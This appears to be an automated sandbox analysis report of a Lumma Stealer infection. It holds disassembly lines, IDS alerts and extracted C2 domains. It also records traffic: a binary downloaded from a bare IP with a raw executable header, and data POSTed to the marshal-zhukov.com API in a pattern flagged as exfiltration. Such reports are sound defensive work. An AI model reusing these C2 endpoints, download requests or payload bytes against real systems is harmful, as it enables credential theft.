Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx eax, byte ptr [ebx]	5_2_0043AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]	5_2_00427D36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax-22h]	5_2_00416DEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_0041DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], BB9B186Eh	5_2_0043B5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h	5_2_00435660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], B62B8D10h	5_2_00435660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-00000089h]	5_2_00417675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], cl	5_2_00417675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_00419E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_00419E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	5_2_004166F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-00000089h]	5_2_00417670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], cl	5_2_00417670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-4Fh]	5_2_00423710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_00423F24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esp+08h]	5_2_004077F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	5_2_004077F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]	5_2_004077F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_0041D780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+42E11899h]	5_2_0040D787
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	5_2_00413798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	5_2_004397A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.5:49466 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057344 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs) : 192.168.2.5:52893 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057340 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs) : 192.168.2.5:55432 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs) : 192.168.2.5:49300 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (netwrokenb .cyou) : 192.168.2.5:63925 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057411 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (netwrokenb .cyou in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs) : 192.168.2.5:62596 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057350 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs) : 192.168.2.5:51358 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057348 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs) : 192.168.2.5:55898 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.5:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2057346 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs) : 192.168.2.5:51047 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs) : 192.168.2.5:53035 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49706 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: brownieyuz.sbs
Source: Malware configuration extractor	URLs: relalingj.sbs
Source: Malware configuration extractor	URLs: thinkyyokej.sbs
Source: Malware configuration extractor	URLs: tamedgeesy.sbs
Source: Malware configuration extractor	URLs: rottieud.sbs
Source: Malware configuration extractor	URLs: netwrokenb.cyou
Source: Malware configuration extractor	URLs: repostebhu.sbs
Source: Malware configuration extractor	URLs: ducksringjk.sbs
Source: Malware configuration extractor	URLs: explainvees.sbs

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Nov 2024 07:08:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 09 Nov 2024 19:43:55 GMTETag: "48400-62680167b1aa2"Accept-Ranges: bytesContent-Length: 295936Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 49 a2 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 c0 00 00 00 00 00 00 f0 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ea eb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 38 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 ed 03 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba be 03 00 00 10 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a1 20 00 00 00 d0 03 00 00 22 00 00 00 c4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 48 03 01 00 00 00 04 00 00 5c 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 10 05 00 00 02 00 00 00 42 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 3f 00 00 00 20 05 00 00 40 00 00 00 44 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /infopage/tbh75.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49912

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: netwrokenb.cyou
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XQBYBEG863User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12792Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K2WH2DKYB9DNNTZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P24M2DAMOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D8I0HQKDVAZZVINLCEDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8FZDPWUZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586109Host: marshal-zhukov.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: marshal-zhukov.com

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /infopage/tbh75.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: owered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: owered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persist# equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: netwrokenb.cyou
Source: global traffic	DNS traffic detected: DNS query: repostebhu.sbs
Source: global traffic	DNS traffic detected: DNS query: thinkyyokej.sbs
Source: global traffic	DNS traffic detected: DNS query: ducksringjk.sbs
Source: global traffic	DNS traffic detected: DNS query: explainvees.sbs
Source: global traffic	DNS traffic detected: DNS query: brownieyuz.sbs
Source: global traffic	DNS traffic detected: DNS query: rottieud.sbs
Source: global traffic	DNS traffic detected: DNS query: relalingj.sbs
Source: global traffic	DNS traffic detected: DNS query: tamedgeesy.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: marshal-zhukov.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: netwrokenb.cyou

Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/tbh75.exe
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/tbh75.exeP
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209520966.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/
Source: RegAsm.exe, 00000005.00000002.2210080983.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/api
Source: RegAsm.exe, 00000005.00000002.2210006355.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apiya
Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com:443/api
Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com:443/apiK
Source: RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com:443/apiicrosoft
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://netwrokenb.cyou/api
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
